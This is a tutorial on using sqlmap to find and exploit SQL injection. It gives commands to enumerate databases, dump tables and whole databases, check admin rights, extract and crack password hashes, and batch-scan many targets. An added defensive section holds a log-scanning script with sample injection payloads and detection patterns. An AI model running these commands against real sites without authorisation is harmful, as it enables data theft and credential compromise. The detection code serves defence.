How to use SQLmap in Kali Linux? Full Explanation and Documentation.



Now it is recommended that you go through the above tutorial once so that you can get an idea about how to find vulnerable sites. In this tutorial we’ll skip the first few steps in which we find out whether a website is vulnerable or not, as we already know from the previous tutorial that this website is vulnerable.



Basically it's just a tool to make SQL injection easier. The sqlmap website introduces the tool as: "sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system"

We are going to do this on a test site.


This tutorial demonstrates GET-method-based SQL injection using sqlmap.

SQLmap can also crack hashed passwords. SQLmap comes preinstalled in Kali Linux. If you are using another Linux distro such as Debian, Ubuntu, or Arch, you can easily get it from the official repositories.

SQLmap is a terminal based application. So fire up your terminal and just type sqlmap to check if it is already installed.

Install SQLmap

Debian and Ubuntu based distros

#sudo apt-get install sqlmap

Arch based distros

#sudo pacman -S sqlmap

RedHat based distros

#sudo yum install sqlmap

Once SQLmap is installed then all you need is a vulnerable target to see its magic.

SQL injection using SQLmap

The basic command structure is very simple. First you write sqlmap, then the -u option and the target URL, followed by any options that control where and how the injection is tested.

#sqlmap -u "url"

This command tests the target for SQL injection and reports whether it is vulnerable. If it is, all the SQL injection techniques that work against that target are listed. To retrieve any information, you first need the list of databases available on the target machine.

#sqlmap -u "url" --dbs

The --dbs option lists all the available databases on the target machine if the target is vulnerable to SQL injection. Once you have the list of databases, the next step is to get the list of all the tables in the selected database.

#sqlmap -u "url" --tables -D database-name

Here the --tables option extracts the list of all the tables in the selected database. The -D option specifies the database name that you found in the previous step. Next you need to list all the columns in the table.

#sqlmap -u "url" --columns -D database-name -T table-name 

The --columns option tells sqlmap to get the names of all the columns, and the additional -T argument specifies the table whose columns you want to list.

Once you have the column names, you can either dump the data of all the columns from the database into a CSV file or dump the data from selected fields only.

#sqlmap -u "url" --dump -D database-name -T table-name

This command tells sqlmap to dump all the data from the table table-name in the database database-name.

You can also dump the whole database by using the following command:

#sqlmap -u "url" --dump -D database-name
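
From the defender's side, the enumeration steps above leave recognisable traces in the web server's access log. The following is an added example, not part of the original tutorial: it scans access-log lines for sqlmap's default User-Agent and for the information_schema lookups that --dbs, --tables and --columns produce on MySQL. The log lines, addresses, indicator names and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format); addresses, paths and payloads are made up.
SAMPLE_LOG = [
    '198.51.100.4 - - [01/Jan/2024:10:00:00 +0000] "GET /item.php?id=5 HTTP/1.1" 200 812 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /item.php?id=5%20AND%203%3D3 HTTP/1.1" 200 812 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /item.php?id=5%20UNION%20ALL%20SELECT%20schema_name%20FROM%20information_schema.schemata HTTP/1.1" 200 990 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '192.0.2.9 - - [01/Jan/2024:10:05:00 +0000] "GET /item.php?id=5+UNION+ALL+SELECT+table_name+FROM+INFORMATION_SCHEMA.TABLES HTTP/1.1" 200 990 "-" "Mozilla/5.0 (Windows NT 10.0)"',
]

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
                     r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Indicator name -> (field to inspect, pattern). Names are chosen for this example.
INDICATORS = {
    "default-user-agent": ("ua", re.compile(r"^sqlmap/", re.I)),
    "boolean-probe": ("query", re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*\1\b", re.I)),
    "union-select": ("query", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    "schema-enumeration": ("query", re.compile(r"\binformation_schema\.(?:schemata|tables|columns)\b", re.I)),
}

def classify(line):
    """Return (client_ip, set of indicator names) for one log line, or None if unparsable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    _, _, query = m.group("target").partition("?")
    fields = {"ua": m.group("ua"), "query": unquote_plus(query)}  # decode %20 and + first
    hits = {name for name, (field, rx) in INDICATORS.items() if rx.search(fields[field])}
    return m.group("ip"), hits

def suspicious_clients(lines):
    """Map each client IP to the sorted indicators seen across all of its requests."""
    seen = {}
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[1]:
            seen.setdefault(parsed[0], set()).update(parsed[1])
    return {ip: sorted(tags) for ip, tags in seen.items()}

if __name__ == "__main__":
    for ip, tags in suspicious_clients(SAMPLE_LOG).items():
        print(ip, ", ".join(tags))
```

The second flagged client sends a browser User-Agent, which is why the query-string indicators are checked independently of the header. The real fix remains parameterized queries in the application; log matching only tells you that someone is probing.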

Check whether the user is a database administrator

To see if the current user has root access to the database management system, issue the following command.

#sqlmap -u "url" -o -b --current-user --is-dba

If the current user turns out to be a root user, you can extract the password hashes for that user and all the other users. Use the following command.

#sqlmap -u "url" -v1 --current-user --passwords

SQLmap on a list of multiple targets

sqlmap is a very flexible tool. You can give it any number of targets in a text file and it will test each of them in turn.

#sqlmap -m "path-to-file" --batch

Here the --batch option processes all the targets with default options, without asking for input.

SQLmap also has password cracking capability. It can perform a dictionary attack on the hashes it finds. How long the hash cracking takes depends on your CPU power.